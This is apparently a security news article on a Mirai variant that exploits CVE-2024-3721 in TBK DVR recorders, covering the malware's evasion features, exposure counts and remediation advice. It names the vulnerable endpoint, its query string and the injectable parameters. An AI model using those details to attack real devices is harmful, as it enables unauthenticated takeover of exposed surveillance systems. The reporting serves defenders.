A new wave of Mirai botnet activity is exploiting a recently disclosed vulnerability in TBK DVR devices, CVE-2024-3721, to infect internet-connected systems with a custom ARM32 malware variant designed to evade analysis and sustain persistent remote control.
Kaspersky uncovered the exploitation attempt while monitoring honeypots. The campaign targets a command injection flaw in TBK DVR-4104 and DVR-4216 devices, allowing unauthenticated remote attackers to execute arbitrary Linux commands via a specially crafted POST request to the device's HTTP interface. The vulnerability, cataloged as CVE-2024-3721, stems from improper input sanitization in the /device.rsp endpoint, specifically via the mdb and mdc parameters.
Kaspersky's telemetry first detected exploitation attempts in early June 2025. A malicious request was observed in the honeypot logs, embedding shell commands to download and execute an ARM32 binary.
This approach bypasses traditional platform detection since it directly targets ARM32-compatible devices, an architecture used by many DVRs, thus streamlining the infection process and minimizing operational noise.
The vulnerable devices are digital video recorders (DVRs) manufactured by TBK, widely deployed for surveillance applications, and accessible remotely via web interfaces. According to public scans, over 50,000 such devices remain exposed online, although the total potentially affected population exceeds 114,000 globally. Countries with the highest number of observed infections include China, India, Egypt, Ukraine, Russia, Turkey, and Brazil.
Once executed, the downloaded binary turns out to be a customized Mirai variant. While Mirai has been circulating since its source code leaked in 2016, this new version includes several upgrades:
- RC4 Encryption with XOR-Obfuscated Key: Malware strings are encrypted using RC4 with a key obfuscated via XOR. The recovered key is 6e7976666525a97639777d2d7f303177, used to decrypt strings stored in a global list for runtime access.
- Anti-VM and Anti-Emulation Checks: The implant scans /proc for process names indicating virtualized environments such as QEMU or VMware. If such indicators are present, execution halts.
- Directory Whitelist Enforcement: Execution is limited to a set of hardcoded directories, helping avoid unintended environments and complicating automated analysis.
The vulnerability was disclosed via a public GitHub repository by a user named “netsecfish“, who provided a full proof-of-concept demonstrating command injection via curl. The attack relies on direct manipulation of the POST parameters in /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX, with no user interaction required, qualifying it as a critical remote code execution risk.
The same researcher has previously disclosed exploits against end-of-life (EoL) D-Link routers, impacting over 90,000 devices.
It is unclear if CVE-2024-3721 has been fixed by TBK DVR. Considering how many third-party brands use the device as a basis for their models, patch availability varies, and it's very likely that for most, there is none. That said, if you use TBK DVR-4104, DVR-4216, or re-brands of them, contact your vendor for patch availability. If no fixes are to be rolled out, replace the devices with actively supported models.
Leave a Reply